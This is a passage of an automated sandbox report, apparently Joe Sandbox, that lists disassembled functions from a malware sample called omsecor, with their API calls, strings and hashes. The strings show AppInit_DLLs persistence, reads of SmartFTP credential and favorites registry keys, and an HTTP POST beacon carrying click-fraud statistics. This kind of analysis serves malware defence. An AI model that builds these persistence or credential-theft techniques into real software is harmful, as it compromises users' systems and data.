                                                                                                                                                                                                                • Instruction Fuzzy Hash: C9214832A00108BBDB01DFAADC44B9E7BB8EF48345F1484B6E805F71A1D774AE41DB84
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • _memset.LIBCMT ref: 0040A26B
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 0040A28E
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 0040A296
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040A2CA
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 0040A2CF
                                                                                                                                                                                                                  • Part of subcall function 00409FB1: GetTickCount.KERNEL32 ref: 00409FCE
                                                                                                                                                                                                                  • Part of subcall function 00409FB1: GetTickCount.KERNEL32 ref: 00409FDE
                                                                                                                                                                                                                  • Part of subcall function 00409FB1: Sleep.KERNEL32(00000064,?,?,0040A442,?,?), ref: 00409FEC
                                                                                                                                                                                                                  • Part of subcall function 00409FB1: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409FFB
                                                                                                                                                                                                                  • Part of subcall function 00409FB1: DispatchMessageW.USER32(?), ref: 0040A009
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: String$AllocCountFreeMessageTick$DispatchPeekSleep_memset
                                                                                                                                                                                                                • String ID: J(@
                                                                                                                                                                                                                • API String ID: 3143865713-2848800318
                                                                                                                                                                                                                • Opcode ID: 68495801366515c75ff4f7091ec1779cfaae467043e456767ef3efc9e03748a3
                                                                                                                                                                                                                • Instruction ID: bfa1c3e5fdaec5be4dfb18607c12502589e7fd5433bac8caf4aacda455aa0499
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 68495801366515c75ff4f7091ec1779cfaae467043e456767ef3efc9e03748a3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3A118F72D10219ABCB00DFA9DD448DEBBB9FF08354B11456AF415B7290E770AE14CFA4
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows NT\CurrentVersion\Windows,00000000,00000001,?,?,00000000), ref: 00408628
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000000), ref: 0040864A
                                                                                                                                                                                                                  • Part of subcall function 004069C0: RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,75B4E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                                                                                                                                                                                                                  • Part of subcall function 004069C0: RegCloseKey.KERNEL32(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                                                                                                                                                                                                                • DeleteFileW.KERNEL32(C:\WINDOWS\system32\gbdwpbm.dll,?,00000000), ref: 00408687
                                                                                                                                                                                                                  • Part of subcall function 004069FD: RegCreateKeyExW.ADVAPI32(0040EA48,00000000,00000000,00000000,00000000,00020006,00000000,00000002,0040EA48,?,?,?,?,00406AD3,80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current), ref: 00406A22
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseCreateDeleteErrorFileLastOpenQueryValue
                                                                                                                                                                                                                • String ID: AppInit_DLLs$C:\WINDOWS\system32\gbdwpbm.dll$Software\Microsoft\Windows NT\CurrentVersion\Windows
                                                                                                                                                                                                                • API String ID: 4026185228-3265104503
                                                                                                                                                                                                                • Opcode ID: b4fb547f36a341d56e63cd8c3141924342823e6c0e28cdd89059e7ce4998d0d2
                                                                                                                                                                                                                • Instruction ID: 1689b80d2e7b4165945397198c320d7ed833f5e108bfbebac4dfc06446509e60
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b4fb547f36a341d56e63cd8c3141924342823e6c0e28cdd89059e7ce4998d0d2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 99014CB2A44124B6E62067665E06F9B72AC9B00750F220D7BF905F31C0DABA9D1446AD
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 00409B00
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 00409B0E
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AllocString
                                                                                                                                                                                                                • String ID: </title>$</url>$<title>$<url>
                                                                                                                                                                                                                • API String ID: 2525500382-2286408829
                                                                                                                                                                                                                • Opcode ID: accc4c2b32817054c02e480ca82d26facf4490b578c9b74d600f9b3addd9539d
                                                                                                                                                                                                                • Instruction ID: e94fff7a9c4556839c155ffec7726d55edf757161a42396596b5093e86978141
                                                                                                                                                                                                                • Opcode Fuzzy Hash: accc4c2b32817054c02e480ca82d26facf4490b578c9b74d600f9b3addd9539d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4F01DB7564021CA7DB116A55CC41FD637A8BB44799F044077FA04F32C3E978AA0C4BA4
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                                                                                                                                                                                                                • Sleep.KERNEL32(00002710,?,?,?,?,00402C8F,00000032,00000000,00000000,00000000,00000000,?), ref: 0040A91C
                                                                                                                                                                                                                • Sleep.KERNEL32(00002710), ref: 0040AAC1
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040AAE9
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 0040AAF0
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s, xrefs: 0040A957
                                                                                                                                                                                                                • 0, xrefs: 0040AA5B
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HeapSleep$AttemptConnectFreeInternetProcess
                                                                                                                                                                                                                • String ID: 0$jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s
                                                                                                                                                                                                                • API String ID: 3713053250-1268808612
                                                                                                                                                                                                                • Opcode ID: b149150f67450d10939e037a4072d5df3dc9b6793fc6db3c061519f1f12da8b2
                                                                                                                                                                                                                • Instruction ID: cb73c9a78e41fc00613c6eff30345c36a412e41c8c720ed22b53be089701fd16
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b149150f67450d10939e037a4072d5df3dc9b6793fc6db3c061519f1f12da8b2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 88515072A00218A6CF10EB95DC959DF737DEF44308F40447BF406B7281EB789A958FAA
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetLocalTime.KERNEL32(?,?), ref: 004074AD
                                                                                                                                                                                                                • GetLocalTime.KERNEL32(00000000), ref: 004074B3
                                                                                                                                                                                                                • GetTimeZoneInformation.KERNEL32(?), ref: 004074EA
                                                                                                                                                                                                                • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 00407525
                                                                                                                                                                                                                • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 0040752F
                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040754A
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Time$FileLocalSystem$InformationUnothrow_t@std@@@Zone__ehfuncinfo$??2@
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3777474486-0
                                                                                                                                                                                                                • Opcode ID: dc75d57b0fd5e0fdd9494c9f665b53f3e55cd7f2b0e9017e93342081d6970c63
                                                                                                                                                                                                                • Instruction ID: c9ff0a62426275c5a0d4f0aa0fa2549fa158b312224671bef63f429b7f92df75
                                                                                                                                                                                                                • Opcode Fuzzy Hash: dc75d57b0fd5e0fdd9494c9f665b53f3e55cd7f2b0e9017e93342081d6970c63
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 03112C72D1022DAADF00EBD4DC44AEEB7FCBF48314F04445AE901B7240E7B9A608CBA5
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 004083DC
                                                                                                                                                                                                                • GetFileSizeEx.KERNEL32(00000000,?), ref: 004083EF
                                                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00408417
                                                                                                                                                                                                                • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 0040842F
                                                                                                                                                                                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00408449
                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00408452
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$Virtual$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1974014688-0
                                                                                                                                                                                                                • Opcode ID: c2b876117cf5bdd4c26ea99d0d1f22b8a7b68d93f1e59a17f5f06edaaf93f8ba
                                                                                                                                                                                                                • Instruction ID: 01d1f8b5f38b633e5055412454defe488cd8fa266e80ff04f0611ceb3180ae32
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c2b876117cf5bdd4c26ea99d0d1f22b8a7b68d93f1e59a17f5f06edaaf93f8ba
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 47115170500201FBEB305F56CE49E5BBBB9EB90700F10892DF596F21E0EB74A951DB28
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • InternetConnectW.WININET(?,00000050,00000000,00000000,00000003,00000000,00000000,?), ref: 00409EA3
                                                                                                                                                                                                                • HttpOpenRequestW.WININET(00000000,POST,04400100,00000000,00000000,00000000,04400100,00000000), ref: 00409EC3
                                                                                                                                                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,?,?), ref: 00409EDA
                                                                                                                                                                                                                • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00409F00
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HttpInternetRequest$ConnectFileOpenReadSend
                                                                                                                                                                                                                • String ID: POST
                                                                                                                                                                                                                • API String ID: 961146071-1814004025
                                                                                                                                                                                                                • Opcode ID: 20f9c5eacef7b48b8181bad7e01822bf71c4addd269446e4957b1a187c5c6ded
                                                                                                                                                                                                                • Instruction ID: 440a75f1c6cd1a7483e62584c22426b42aa3ce760e55699d8a89a0e8c7b72afb
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 20f9c5eacef7b48b8181bad7e01822bf71c4addd269446e4957b1a187c5c6ded
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B8318E71900119BFDB10DBA4DC84EFE7679EB54349F14087AFA41B62C2D6385E448BA8
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                                                                                                                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,?,00000008), ref: 004051EB
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • SOFTWARE\smartftp\client 2.0\settings\backup, xrefs: 00405168
                                                                                                                                                                                                                • SOFTWARE\smartftp\client 2.0\settings\general\favorites, xrefs: 00405157
                                                                                                                                                                                                                • folder, xrefs: 00405184
                                                                                                                                                                                                                • personal favorites, xrefs: 00405176
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: EnvironmentExpandOpenStrings
                                                                                                                                                                                                                • String ID: SOFTWARE\smartftp\client 2.0\settings\backup$SOFTWARE\smartftp\client 2.0\settings\general\favorites$folder$personal favorites
                                                                                                                                                                                                                • API String ID: 3923277744-821743658
                                                                                                                                                                                                                • Opcode ID: e843f97767911fec9b6fd3034691d6ab50a9750596cd8693bb12be5acb83529b
                                                                                                                                                                                                                • Instruction ID: 0454e2dbaba930a1c05830d090df37f1eb9a44f33d61805f8e12f109ce5a2445
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e843f97767911fec9b6fd3034691d6ab50a9750596cd8693bb12be5acb83529b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 21213E71D00518ABDB10EB95DC41ADFB7BCEB44318F1084B7E514B2181EB389B49CFA9
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 0040A0C0
                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,0040A16F,00427ED0,00000000,00000001,?,00402806,?), ref: 0040A0CE
                                                                                                                                                                                                                • CreateWindowExW.USER32(00000000,AtlAxWin,Shell.Explorer,80000000,00000000,00000000,000004B0,00000320,00000000,00000000,00000000), ref: 0040A0F3
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CreateHandleInitializeModuleWindow
                                                                                                                                                                                                                • String ID: AtlAxWin$Shell.Explorer
                                                                                                                                                                                                                • API String ID: 950422046-1300462704
                                                                                                                                                                                                                • Opcode ID: e9b6661190c81bdf072f7cb3f1dc159ab5559684b807faa4a04e62d0e94038f2
                                                                                                                                                                                                                • Instruction ID: 8885d0d040d3ab3e1edd42f45155a7fe84e7bff231f75e8e802cb7627400a982
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e9b6661190c81bdf072f7cb3f1dc159ab5559684b807faa4a04e62d0e94038f2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 78118F30200200FFD320ABA6CC4CE6B7BBCEFCA711B240579F515EB291D7789801CA65
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetSystemTime.KERNEL32(?,?,000003E8,?,?,?,?,?,?,?,?,?,?,?,00407B63,?), ref: 0040727C
                                                                                                                                                                                                                • SystemTimeToFileTime.KERNEL32(?,?,?,000003E8,?), ref: 004072C1
                                                                                                                                                                                                                • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 004072CB
                                                                                                                                                                                                                • __aulldiv.LIBCMT ref: 004072E3
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Time$System$File$__aulldiv
                                                                                                                                                                                                                • String ID: c{@
                                                                                                                                                                                                                • API String ID: 3735792614-264719814
                                                                                                                                                                                                                • Opcode ID: a145c05d1847671377470c3096bfc685d9fda3d476ef25e64420ea8c3ac11d0d
                                                                                                                                                                                                                • Instruction ID: ef19eb4ac8525f4bf2260e0142840e6d018c3cac6eb9bd4f47b1f5cd165e8a78
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a145c05d1847671377470c3096bfc685d9fda3d476ef25e64420ea8c3ac11d0d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D401DE62D1022DAACB01DFE4D984CEFB77DFF44348B00156AE901F7250E7B5AA4887A5
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040286E), ref: 004072F9
                                                                                                                                                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00407337
                                                                                                                                                                                                                • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 00407341
                                                                                                                                                                                                                • __aulldiv.LIBCMT ref: 00407359
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Time$System$File$__aulldiv
                                                                                                                                                                                                                • String ID: n(@
                                                                                                                                                                                                                • API String ID: 3735792614-2525614082
                                                                                                                                                                                                                • Opcode ID: fb9972a15ff1dd7e61217f7ff9a5823acba4978d5a12943579487cf22718de7c
                                                                                                                                                                                                                • Instruction ID: 0875687ad9f8fbdff1f190dbab39d4211c2ed1a8acd2afdabfbd9ccbaffc37b8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: fb9972a15ff1dd7e61217f7ff9a5823acba4978d5a12943579487cf22718de7c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 83011A66D2022DAACF00DBE5DD44CEFB7BCFF44344B04051AE901B3210E7B5A648CBA9
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040AB93
                                                                                                                                                                                                                • CharLowerW.USER32(?), ref: 0040ABA0
                                                                                                                                                                                                                • GetCommandLineW.KERNEL32 ref: 0040ABC0
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CharCommandFileLineLowerModuleName
                                                                                                                                                                                                                • String ID: /updatefile3$netprotdrvss.exe
                                                                                                                                                                                                                • API String ID: 3118597399-3449771660
                                                                                                                                                                                                                • Opcode ID: a9092c2346d55b23f20d8634028d89874de2ded0d1b8197c9b1551ea588aa001
                                                                                                                                                                                                                • Instruction ID: 1eba2a713c21f7c79877a49aa3ec6850c44e44909145826ab611dd80b60fa5a6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a9092c2346d55b23f20d8634028d89874de2ded0d1b8197c9b1551ea588aa001
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 41E09B3655021A5AD750FBB1DD07BA633ACFB01705F1049B6A246F10C0EE74D55D4F9D
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00409FCE
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00409FDE
                                                                                                                                                                                                                • Sleep.KERNEL32(00000064,?,?,0040A442,?,?), ref: 00409FEC
                                                                                                                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409FFB
                                                                                                                                                                                                                • DispatchMessageW.USER32(?), ref: 0040A009
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CountMessageTick$DispatchPeekSleep
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 4159783438-0
                                                                                                                                                                                                                • Opcode ID: 45312298ad5970842c5ee584b14830e042aefe59ca6bdbaf3830585a06b866aa
                                                                                                                                                                                                                • Instruction ID: c0dc46c0c87f7bc49602bd7d2efae9f565a6f52602c3eafe7569a8fa2f6b8eea
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 45312298ad5970842c5ee584b14830e042aefe59ca6bdbaf3830585a06b866aa
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3F118671D103199ECB10AFF5CC8899F7BB9BB45314B144A7AE161F71E0C778CA118B1A
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00409F5B
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00409F5F
                                                                                                                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409F72
                                                                                                                                                                                                                • DispatchMessageW.USER32(?), ref: 00409F80
                                                                                                                                                                                                                • Sleep.KERNEL32(0000012C,?,?,?,?,00000000), ref: 00409F8D
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CountMessageTick$DispatchPeekSleep
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 4159783438-0
                                                                                                                                                                                                                • Opcode ID: ab27e8fd20f0983608bc295b19996ec13099b56f87bcdccced181fb1a6008d05
                                                                                                                                                                                                                • Instruction ID: 2f378a1af0056e794f94b22e0cd08b0b0b180d2e60cd5d2ebdc62f673b65dbb1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ab27e8fd20f0983608bc295b19996ec13099b56f87bcdccced181fb1a6008d05
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D1F0C872D042149BD714B7F2DD09B7D76A89B45714F104A36F551F70D1CA7CCD148A58
                                                                                                                                                                                                                APIs
